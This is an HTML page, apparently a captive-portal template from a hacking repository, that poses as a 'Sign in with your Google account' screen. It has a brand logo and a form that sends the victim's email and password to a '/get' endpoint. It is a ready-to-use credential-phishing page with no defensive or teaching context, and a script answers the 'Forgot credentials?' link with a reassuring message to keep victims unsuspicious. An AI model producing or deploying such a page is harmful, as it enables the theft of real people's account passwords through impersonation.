<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #013c80;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #013c80;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #013c80;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 4px solid #013c80;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #013c80;
  border: none;
  color: #ffffff;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  font-weight: bold;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #013c80;
}
.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="800.000000pt" height="200.000000pt" viewBox="0 0 3793.000000 1000.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,1000.000000) scale(0.100000,-0.100000)"
fill="#013B7E" stroke="none">
<path d="M11486 9217 c-15 -11 -21 -60 -46 -377 -182 -2317 -182 -3714 -1
-6069 27 -349 29 -365 51 -383 28 -23 43 -23 64 1 20 22 25 69 70 711 149
2101 150 3301 5 5340 -49 695 -56 763 -75 777 -23 17 -45 16 -68 0z"/>
<path d="M2790 7824 c-395 -34 -587 -56 -878 -100 l-112 -17 2 -1896 3 -1896
100 -17 c132 -22 395 -54 575 -70 214 -18 759 -15 945 5 528 59 895 208 1159
472 201 201 311 431 338 707 20 196 -7 369 -83 527 -98 207 -257 358 -494 471
-76 36 -260 100 -334 115 l-34 7 89 47 c119 61 242 151 319 232 77 83 116 138
160 232 108 227 98 468 -27 677 -150 251 -479 421 -938 485 -110 16 -672 29
-790 19z m492 -490 c254 -47 420 -150 499 -309 28 -57 34 -81 37 -158 7 -137
-24 -240 -106 -359 -119 -173 -383 -318 -694 -382 -79 -16 -294 -46 -334 -46
l-24 0 0 625 c0 492 3 627 13 630 72 26 468 26 609 -1z m128 -1529 c225 -50
408 -171 503 -333 64 -109 82 -186 82 -347 -1 -157 -14 -220 -71 -345 -155
-335 -520 -498 -1031 -460 -131 10 -175 15 -215 26 -17 5 -18 48 -18 713 l0
709 63 15 c34 8 96 20 137 26 41 6 86 13 100 15 60 10 378 -3 450 -19z"/>
<path d="M8905 7816 c-168 -54 -304 -198 -349 -372 -9 -34 -16 -82 -16 -107
l0 -46 89 6 c84 5 94 4 146 -21 176 -87 270 -443 251 -955 -25 -693 -217
-1361 -475 -1653 -51 -57 -149 -124 -203 -139 -47 -12 -187 -14 -200 -1 -10
10 3 -77 -441 2937 l-43 290 -442 3 c-296 1 -442 -1 -442 -8 0 -6 79 -484 174
-1063 l175 -1053 -24 -121 c-111 -567 -330 -923 -599 -972 -68 -13 -156 -14
-172 -3 -6 4 -30 133 -52 287 -147 995 -181 1229 -258 1745 -46 316 -105 711
-129 877 -25 166 -45 304 -45 307 0 3 -200 6 -445 6 l-444 0 5 -27 c3 -16 148
-891 324 -1947 175 -1055 322 -1922 327 -1927 4 -4 51 -16 103 -25 129 -23
373 -24 498 -1 314 57 594 257 799 569 76 115 153 276 189 390 39 127 40 129
47 93 4 -16 43 -253 88 -525 45 -272 84 -498 88 -502 14 -14 207 -39 351 -45
306 -11 512 30 741 149 581 302 989 1119 1125 2258 24 206 30 702 10 856 -55
419 -217 672 -473 739 -69 18 -223 19 -278 1z"/>
<path d="M14120 7804 c-19 -2 -91 -9 -160 -14 -122 -11 -353 -40 -477 -61
l-63 -11 0 -1377 0 -1378 148 -21 c283 -41 363 -47 682 -47 249 1 340 4 433
18 304 46 527 133 699 274 357 292 425 827 143 1131 -99 106 -229 186 -398
242 l-68 23 53 30 c275 156 416 425 353 672 -67 263 -292 427 -681 496 -96 17
-168 22 -374 24 -140 2 -271 1 -290 -1z m398 -390 c155 -31 271 -104 319 -202
24 -48 28 -69 28 -137 0 -69 -5 -90 -32 -147 -70 -149 -238 -267 -458 -322
-73 -18 -240 -46 -277 -46 l-28 0 0 429 0 430 28 4 c76 11 348 6 420 -9z m87
-1099 c135 -35 253 -111 314 -199 67 -97 93 -264 62 -396 -48 -203 -208 -355
-428 -407 -83 -19 -370 -26 -445 -10 l-38 8 0 493 0 493 60 13 c155 33 361 35
475 5z"/>
<path d="M24610 7793 c-149 -52 -259 -210 -260 -372 l0 -44 43 9 c136 26 205
-22 256 -180 38 -117 46 -192 45 -441 -1 -278 -19 -427 -84 -680 -111 -437
-266 -653 -467 -655 -17 0 -35 5 -38 10 -7 12 -27 140 -235 1554 -60 411 -110
752 -110 757 0 5 -147 9 -340 9 l-340 0 5 -22 c17 -74 247 -1490 247 -1523 0
-52 -46 -246 -84 -355 -68 -193 -168 -335 -271 -384 -53 -25 -153 -41 -173
-28 -6 4 -87 526 -180 1160 l-169 1152 -338 0 -338 0 6 -32 c8 -45 166 -1003
209 -1268 111 -680 247 -1498 251 -1516 6 -28 79 -43 235 -51 191 -9 345 26
494 113 96 56 227 180 296 280 43 62 119 209 157 303 7 19 19 -37 57 -265 27
-159 53 -314 58 -345 l10 -56 76 -14 c49 -9 146 -14 267 -13 161 1 202 4 268
22 247 68 449 221 610 463 175 265 289 560 366 954 46 235 56 357 56 665 -1
288 -1 297 -28 393 -61 227 -152 345 -305 396 -74 25 -187 27 -252 4z"/>
<path d="M19858 7298 l-3 -213 -127 -3 -128 -3 0 -194 0 -194 128 -3 127 -3 6
-635 c6 -706 3 -679 77 -830 41 -84 135 -191 211 -239 114 -74 263 -112 436
-112 134 -1 236 19 330 65 89 43 143 90 180 157 25 46 30 68 33 144 3 74 1 93
-12 104 -13 11 -20 9 -46 -9 -60 -42 -138 -63 -245 -64 -113 -1 -155 10 -230
60 -57 38 -91 83 -116 157 -17 48 -18 101 -19 630 l0 577 290 0 290 0 0 195 0
195 -292 2 -293 3 -3 213 -2 212 -295 0 -295 0 -2 -212z"/>
<path d="M29330 7295 l0 -215 -120 0 -120 0 0 -195 0 -195 120 0 120 0 0 -532
c0 -584 7 -717 45 -835 73 -231 249 -386 497 -437 111 -23 304 -21 400 3 151
39 266 120 311 219 26 60 36 198 15 226 -14 18 -16 18 -54 -7 -160 -100 -408
-81 -523 42 -13 14 -36 50 -50 81 l-26 55 -3 593 -3 592 291 0 290 0 0 195 0
195 -292 2 -293 3 -3 213 -2 212 -300 0 -300 0 0 -215z"/>
<path d="M16785 7139 c-413 -56 -712 -294 -841 -670 -82 -240 -85 -575 -8
-821 162 -518 659 -822 1269 -777 329 25 505 150 537 384 14 92 5 145 -23 145
-12 0 -34 -9 -50 -21 -130 -92 -451 -132 -661 -81 -224 55 -384 180 -477 377
-55 115 -95 275 -69 275 43 1 1349 187 1355 194 4 4 7 73 7 154 -1 124 -5 162
-27 244 -82 310 -312 521 -637 584 -96 19 -285 26 -375 13z m249 -360 c75 -27
139 -87 175 -162 32 -65 59 -193 45 -206 -5 -5 -180 -34 -389 -65 -209 -32
-390 -60 -402 -63 -20 -4 -21 -2 -16 39 10 87 43 209 72 265 43 86 93 138 166
174 107 52 240 59 349 18z"/>
<path d="M26305 7144 c-481 -52 -799 -328 -916 -794 -27 -108 -38 -387 -19
-511 80 -550 505 -928 1088 -968 377 -26 635 65 729 258 24 48 28 71 32 164 2
85 0 107 -10 107 -8 0 -50 -18 -94 -40 -98 -49 -167 -67 -306 -80 -418 -40
-739 153 -847 510 -23 76 -36 160 -26 160 4 0 253 34 553 75 300 42 600 83
666 92 66 8 126 21 133 28 16 15 18 254 2 335 -67 348 -310 586 -665 650 -67
12 -259 20 -320 14z m187 -354 c52 -15 127 -68 165 -118 37 -48 69 -143 74
-217 l4 -50 -405 -61 c-223 -34 -406 -61 -408 -59 -7 7 28 183 48 239 53 155
159 249 310 275 60 11 155 7 212 -9z"/>
<path d="M31480 7139 c-463 -57 -780 -349 -885 -816 -25 -110 -31 -380 -11
-501 91 -546 504 -908 1081 -950 374 -28 646 66 732 253 44 97 55 275 18 275
-8 0 -43 -15 -77 -34 -200 -110 -525 -121 -767 -28 -120 47 -254 163 -324 283
-55 94 -125 329 -98 329 5 0 249 33 543 74 293 41 593 82 666 92 72 10 137 21
144 25 18 12 14 277 -6 367 -73 329 -297 545 -640 618 -88 18 -280 25 -376 13z
m244 -360 c75 -27 139 -87 175 -162 29 -59 59 -193 46 -206 -7 -6 -808 -132
-812 -127 -7 6 28 179 47 235 25 75 78 159 123 197 103 87 285 114 421 63z"/>
<path d="M33950 7135 c-160 -36 -295 -140 -451 -348 -50 -66 -93 -126 -96
-134 -13 -34 -23 -6 -23 66 0 149 -55 263 -161 331 -73 47 -139 63 -249 62
-127 -1 -237 -45 -313 -126 -38 -41 -77 -124 -80 -172 -2 -34 1 -39 18 -35
118 21 170 7 201 -56 18 -36 19 -79 22 -915 l2 -878 300 0 300 0 0 664 0 664
98 93 c108 103 214 177 300 210 45 17 77 22 152 21 52 0 110 -5 129 -11 19 -6
37 -8 40 -5 8 8 36 562 29 570 -14 13 -157 13 -218 -1z"/>
<path d="M35655 7140 c-124 -18 -255 -69 -370 -144 -103 -68 -148 -105 -272
-229 l-103 -101 0 207 0 207 -295 0 -295 0 0 -1075 0 -1075 300 0 300 0 0 674
0 673 93 89 c179 174 284 235 413 242 117 6 170 -23 213 -118 20 -43 21 -64
21 -605 1 -606 5 -663 54 -766 40 -85 88 -134 172 -175 68 -34 84 -38 178 -42
86 -4 116 -1 173 16 146 45 237 143 259 281 l7 44 -29 -8 c-75 -19 -119 -17
-148 6 -62 49 -60 25 -67 804 -6 764 -4 742 -59 859 -81 171 -311 271 -545
236z"/>
<path d="M18706 7129 c-231 -32 -436 -128 -556 -262 -19 -21 -52 -66 -73 -100
-134 -219 -108 -528 62 -718 68 -76 173 -146 381 -254 266 -139 320 -187 328
-295 11 -148 -96 -233 -308 -247 -159 -10 -354 29 -492 98 -32 16 -64 29 -72
29 -22 0 -29 -73 -16 -153 34 -216 198 -333 495 -356 343 -26 628 59 805 240
76 77 121 149 158 251 24 66 27 87 27 213 0 123 -3 148 -24 205 -31 84 -75
152 -142 218 -72 72 -153 124 -354 227 -239 123 -299 166 -336 237 -62 121 27
246 198 278 90 17 280 7 411 -23 l102 -24 5 21 c14 60 64 381 60 384 -25 25
-531 49 -659 31z"/>
<path d="M28195 7129 c-320 -43 -554 -187 -660 -404 -53 -107 -68 -181 -63
-305 6 -123 29 -201 89 -296 74 -117 192 -205 455 -339 265 -135 314 -182 314
-300 0 -76 -28 -129 -93 -172 -144 -96 -477 -79 -709 38 -71 36 -86 36 -94 3
-10 -40 4 -158 26 -216 73 -194 331 -294 690 -267 395 29 657 208 757 514 21
66 26 99 26 190 -1 176 -53 305 -172 422 -77 75 -154 124 -371 238 -210 109
-267 147 -311 208 -28 38 -30 48 -27 103 3 48 10 70 32 98 52 68 163 106 314
106 85 0 258 -24 329 -45 26 -8 49 -13 50 -11 7 7 74 398 69 403 -25 26 -520
50 -651 32z"/>
<path d="M37023 5470 c-133 -27 -217 -136 -217 -280 0 -179 127 -301 298 -288
75 6 130 33 179 87 126 140 88 373 -73 453 -62 30 -126 40 -187 28z m155 -54
c39 -20 88 -70 109 -110 9 -17 18 -63 21 -101 5 -88 -21 -157 -80 -210 -50
-45 -79 -57 -149 -57 -124 0 -216 92 -227 228 -12 157 99 281 244 270 29 -3
65 -11 82 -20z"/>
<path d="M36960 5195 l0 -185 30 0 30 0 0 80 c0 77 1 80 23 80 19 0 29 -11 48
-52 33 -71 70 -108 107 -108 47 0 47 15 0 62 -24 24 -49 57 -56 74 -13 29 -11
33 22 66 26 26 36 45 36 68 0 72 -46 100 -165 100 l-75 0 0 -185z"/>
<path d="M21534 3847 c-2 -7 -3 -344 -2 -748 3 -724 3 -735 24 -780 41 -88
109 -128 215 -129 111 0 197 59 215 149 l7 34 -35 -7 c-46 -8 -65 0 -83 35
-13 24 -15 135 -15 744 l0 715 -160 0 c-124 0 -162 -3 -166 -13z"/>
<path d="M24121 3764 c-156 -33 -286 -125 -344 -243 -30 -61 -32 -72 -32 -171
0 -98 2 -110 32 -173 18 -38 42 -82 54 -98 12 -17 20 -31 18 -33 -2 -1 -24
-17 -49 -33 -57 -39 -123 -109 -148 -160 -94 -184 -55 -410 94 -542 185 -162
502 -186 764 -57 l71 35 58 -45 57 -44 233 2 232 3 -165 138 -165 138 36 47
c84 109 140 287 129 408 -20 207 -148 336 -320 322 -92 -8 -156 -74 -156 -162
l0 -36 45 2 c55 3 90 -21 125 -83 22 -39 25 -55 25 -149 0 -78 -5 -117 -18
-152 -22 -57 -14 -60 -145 58 -129 116 -297 290 -358 369 -124 164 -137 282
-43 372 65 62 174 78 324 49 39 -8 71 -13 72 -12 5 4 34 239 30 242 -9 10
-186 24 -287 23 -58 0 -134 -7 -169 -15z m72 -1109 l238 -236 -38 -17 c-28
-12 -66 -17 -138 -17 -87 0 -107 3 -155 26 -122 58 -198 162 -208 284 -4 59
-2 71 27 130 18 36 33 65 34 65 2 0 109 -106 240 -235z"/>
<path d="M26005 3760 c-99 -4 -190 -8 -202 -9 l-23 -1 0 -775 0 -775 178 2
177 3 3 333 2 332 69 0 68 0 33 -92 c50 -140 144 -317 209 -395 108 -129 205
-182 347 -191 132 -7 218 31 255 112 31 67 27 75 -35 73 -44 -1 -62 4 -96 27
-94 62 -216 215 -332 416 -32 56 -58 103 -56 105 2 1 31 17 64 34 155 82 244
210 252 365 12 225 -115 366 -378 420 -96 19 -306 26 -535 16z m393 -214 c63
-22 98 -51 129 -104 24 -41 28 -57 28 -127 -1 -87 -13 -120 -61 -169 -61 -61
-178 -93 -291 -81 l-63 7 0 243 0 244 33 4 c55 8 180 -1 225 -17z"/>
<path d="M16400 2980 l0 -780 175 0 175 0 0 360 0 360 340 0 340 0 0 -360 0
-360 178 2 177 3 3 778 2 777 -180 0 -180 0 0 -300 0 -300 -340 0 -340 0 0
300 0 300 -175 0 -175 0 0 -780z"/>
<path d="M19508 3498 l-3 -113 -67 -3 -68 -3 0 -109 0 -110 70 0 70 0 0 -333
c0 -268 3 -344 15 -392 47 -179 207 -278 422 -262 56 4 92 14 137 36 82 40
109 78 114 159 3 34 0 62 -5 62 -5 0 -26 -9 -48 -20 -28 -14 -59 -20 -110 -20
-86 0 -139 26 -172 85 -22 39 -23 46 -23 363 l0 322 155 0 155 0 0 110 0 110
-160 0 -160 0 0 115 0 115 -160 0 -159 0 -3 -112z"/>
<path d="M31798 3498 l-3 -113 -67 -3 -68 -3 0 -109 0 -110 70 0 70 0 0 -339
c0 -387 6 -426 79 -518 100 -127 337 -172 495 -94 78 39 108 81 114 162 5 66
-4 73 -48 42 -19 -14 -45 -18 -117 -18 -98 0 -124 10 -166 66 -32 44 -37 95
-37 402 l0 297 160 0 160 0 0 110 0 110 -160 0 -160 0 0 115 0 115 -160 0
-159 0 -3 -112z"/>
<path d="M18525 3406 c-193 -38 -325 -134 -404 -293 -48 -95 -65 -180 -64
-318 2 -207 57 -359 173 -476 113 -114 270 -168 444 -154 337 28 546 281 549
665 2 301 -121 488 -373 564 -76 23 -238 29 -325 12z m212 -227 c79 -38 127
-133 145 -290 27 -226 -44 -448 -159 -495 -42 -18 -114 -18 -156 0 -45 18
-103 88 -126 151 -48 129 -59 358 -22 475 23 74 77 145 125 166 48 21 143 17
193 -7z"/>
<path d="M20748 3409 c-307 -41 -505 -301 -485 -639 16 -278 170 -481 432
-567 71 -24 96 -27 225 -27 129 0 152 2 205 23 102 40 155 116 155 220 0 22
-5 41 -10 41 -6 0 -33 -11 -61 -25 -113 -58 -302 -56 -425 5 -102 50 -181 156
-203 272 l-8 46 71 11 c39 5 207 29 374 52 l302 42 0 94 c0 266 -164 436 -440
456 -36 3 -95 1 -132 -4z m140 -194 c49 -21 81 -52 103 -100 19 -40 26 -105
12 -106 -5 0 -102 -15 -218 -33 -115 -18 -212 -32 -214 -30 -8 7 21 130 39
164 52 100 176 147 278 105z"/>
<path d="M27652 3410 c-236 -33 -406 -185 -469 -421 -23 -87 -22 -271 1 -359
58 -216 222 -376 446 -437 93 -25 293 -25 377 1 113 34 172 108 173 214 0 28
-3 52 -7 52 -3 0 -29 -11 -57 -25 -117 -57 -301 -56 -423 1 -102 49 -191 168
-209 280 -7 49 -55 37 393 100 l342 47 6 51 c16 128 -38 282 -129 371 -106
103 -269 149 -444 125z m136 -193 c41 -15 91 -63 107 -102 15 -37 28 -105 20
-105 -11 0 -400 -60 -423 -65 -23 -6 -24 -4 -17 37 11 66 35 130 62 166 51 68
165 100 251 69z"/>
<path d="M29855 3414 c-263 -43 -437 -199 -491 -440 -23 -106 -15 -310 16
-409 65 -206 200 -340 390 -386 71 -17 229 -17 300 0 202 50 357 209 422 436
30 106 33 327 5 420 -58 191 -178 312 -358 361 -56 15 -232 26 -284 18z m175
-234 c103 -53 158 -211 147 -425 -9 -180 -61 -306 -147 -354 -35 -19 -52 -23
-105 -19 -53 3 -71 9 -102 34 -47 38 -76 88 -106 179 -19 61 -22 91 -22 230 0
144 3 166 23 218 45 111 105 156 210 157 44 0 75 -6 102 -20z"/>
<path d="M31423 3410 c-91 -18 -166 -75 -253 -192 -60 -80 -60 -81 -60 -46 0
65 -28 134 -69 171 -119 107 -344 49 -368 -96 l-5 -35 43 5 c36 4 48 1 64 -17
19 -21 20 -38 23 -511 l3 -489 162 2 162 3 3 365 2 365 48 43 c115 106 205
144 295 125 l46 -10 5 61 c3 33 8 104 11 157 l6 96 -32 7 c-17 3 -34 6 -38 5
-3 -1 -25 -5 -48 -9z"/>
<path d="M22452 3395 c-235 -54 -370 -242 -318 -443 31 -121 85 -174 286 -281
139 -74 170 -104 170 -165 0 -82 -70 -126 -200 -126 -76 0 -174 22 -231 50
-47 25 -59 20 -59 -23 0 -94 56 -173 148 -208 120 -46 336 -34 458 26 164 80
249 260 200 426 -32 111 -93 168 -288 270 -134 70 -178 110 -178 165 0 84 104
127 258 105 48 -6 99 -14 113 -17 26 -6 27 -4 38 58 26 149 26 154 0 162 -51
15 -332 16 -397 1z"/>
<path d="M28719 3396 c-143 -33 -257 -117 -307 -224 -21 -47 -26 -72 -26 -138
0 -71 4 -89 32 -147 40 -82 87 -120 245 -204 151 -80 187 -114 187 -179 0 -57
-35 -96 -101 -114 -68 -19 -201 -7 -284 25 -100 38 -100 38 -99 -15 1 -68 11
-97 50 -140 50 -56 124 -81 249 -87 231 -11 400 69 477 225 30 61 33 74 33
162 0 84 -4 101 -27 146 -39 73 -111 132 -259 209 -146 77 -189 115 -189 171
0 98 157 139 348 92 23 -6 45 -8 48 -6 3 3 13 53 23 111 l18 105 -26 6 c-57
14 -336 15 -392 2z"/>
<path d="M32913 3395 c-78 -18 -172 -65 -223 -111 -22 -20 -54 -66 -72 -102
-29 -58 -33 -76 -33 -147 0 -71 4 -88 33 -148 42 -84 101 -133 250 -209 58
-29 122 -69 144 -89 33 -32 38 -41 38 -82 0 -82 -71 -127 -201 -127 -76 0
-174 22 -230 50 -47 25 -59 20 -59 -23 0 -82 47 -160 119 -196 117 -59 344
-53 484 13 166 79 252 260 203 427 -32 111 -91 166 -289 270 -134 71 -177 111
-177 165 0 84 103 126 258 106 48 -7 99 -15 113 -18 26 -6 27 -4 38 58 26 149
26 154 0 162 -51 15 -332 16 -396 1z"/>
</g>
</svg>
  
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue as guest</button>
	  
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>
	  				<div class="error-message"></div>
    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
